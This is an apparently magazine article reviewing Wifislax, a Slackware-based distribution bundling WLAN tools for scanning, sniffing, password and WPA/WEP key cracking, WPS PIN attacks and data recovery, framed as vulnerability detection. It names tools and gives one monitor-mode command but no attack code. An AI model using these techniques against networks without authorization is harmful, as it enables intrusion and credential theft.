Detecting vulnerabilities in the WLAN with Wifislax

Overview

Many analysis programs, such as the Angry IP scanner, Etherape, Iptraf, the Net Activity Viewer, Wireshark, and Zenmap are available in the Wifislax | Network Tools menu to give you an overview of your a network.

These tools not only graphically visualize the local network but also provide the first indications of malicious or unusual traffic. With the well-known sniffing tool Ettercap, you can also record data transmissions, including insecure passwords on the internal network.

The Hping3, Mdk3, and Yersinia programs reveal weak spots in firewalls, clients, servers or routers using data flooding technologies. Yersinia also exploits known vulnerabilities in different network protocols to detect configuration deficits.

Applications such as Medusa and Hydra are dedicated to securing passwords and authentication mechanisms. Using dictionary attacks, these tools try to decrypt passwords, although Medusa primarily concentrates on the WLAN router. However, most programs from this group only work if you switch the computer's WLAN card to the monitor mode. You can do this at the command line with the command airmon-ng: Without any parameters, it shows the WLAN card's current status. Then – if the WLAN adapter is not yet in monitor mode – enter the command airmon-ng start <Adapter> (Figure 3).

Figure 3: The terminal command airmon-ng switches the WLAN card to monitor mode.

You will also find tools that use a dictionary attack in the Decrypters menu. The menu assigns the tools to country-specific groups and also takes special hardware into account. For example, special scripts are available for providers Alice and Vodafone; they target the routers supplied by these providers, sounding them out for security vulnerabilities. The scripts that examine WLAN routers from manufacturers such as D-Link or TP-Link for gaps in the authentication are more neutral in their approach.

Additionally, other tools work independently of manufacturer and device. You can find these tools in the Suite aircrack-ng, Wireless, and Wpa submenus. The Aircrack suite offers extensive opportunities for sniffing data traffic on a WLAN; it can also extract WEP, WPA, and WPA2 keys from the WLAN using brute-force and dictionary attacks. Also, tools in the Aircrack suite can decrypt data streams that have been "secured" using a WEP or WPA key, provided that the associated key is known.

The Wireless and Wpa menus group offer additional analysis tools, which are again a mixture of command-based programs and tools with a graphical user interface. The focus of these utilities is also in finding and testing WLAN networks.

Lesser-known software, such as Wifi Metropolis, Minidwep-gtk (Figure 4), and GOYscript, are included, as well as the standard WLAN sniffer Kismet. The Wpa menu also includes several programs for recording WPA handshakes, such as Autohs GUI, coWPAtty, or HandShaker.

Figure 4: Minidwep gives you a quick overview of WLANs in your area.

Many newer devices are integrated using WPS (WiFi Protected Setup) without cumbersome key acquisition on a WLAN. Authentication is usually performed using a PIN. This method has serious security vulnerabilities. Wifislax developers implemented their own Wpa wps submenu in order to detect the weak points on the WLAN. The Wpa wps submenu contains software that is suitable for detecting WPS-enabled devices on the WLAN, testing existing keys, and also generating PIN codes.

Additional Software

Wifislax may focus on network security, but it also provides several applications for data reconstruction. These include the programs Testdisk and Qphotorec programs in the System | Repair & Recover Tools menus. For forensic tasks under Wifislax | Forensics, you will also find some useful programs such as Dumpzilla and Grampus, which can be use for extracting metadata for forensic tasks.

If you are missing an application, you can install it using the package management system. Wifislax uses Slackware package management and – in the form of Gslapt – also provides a graphical interface for software installation that is strongly reminiscent of Synaptic under System | Wifislax packets administrator. You will also find a converter that allows you to convert third-party packages to the XZM package format used by Slackware (Figure 5).

Figure 5: Wifislax using the Slackware package management system, which you can access via Gslapt.

Conclusions

Wifislax offers a good selection of testing tools, which you can use to track security vulnerabilities quickly for virtually all common WLAN security application scenarios. In addition, the Wifislax distribution is also capable of data reconstruction. The cumbersome installation wizard and the incomplete localization of certain programs are both areas for improvement.

Buy this article as PDF

Express-Checkout as PDF
Price $2.95
(incl. VAT)

Buy Linux Magazine

SINGLE ISSUES
 
SUBSCRIPTIONS
 
TABLET & SMARTPHONE APPS
Get it on Google Play

US / Canada

Get it on Google Play

UK / Australia

Related content

  • Wifislax 4.6

    Almost every wireless LAN has some potential security weaknesses. The Wifislax Slackware derivative helps detect and eliminate them.

  • SystemRescueCd

    If you accidentally delete data or format a disk, good advice can be expensive. Or maybe not: You can undo many data losses with SystemRescueCd.

comments powered by Disqus

Direct Download

Read full article as PDF:

Price $2.95

News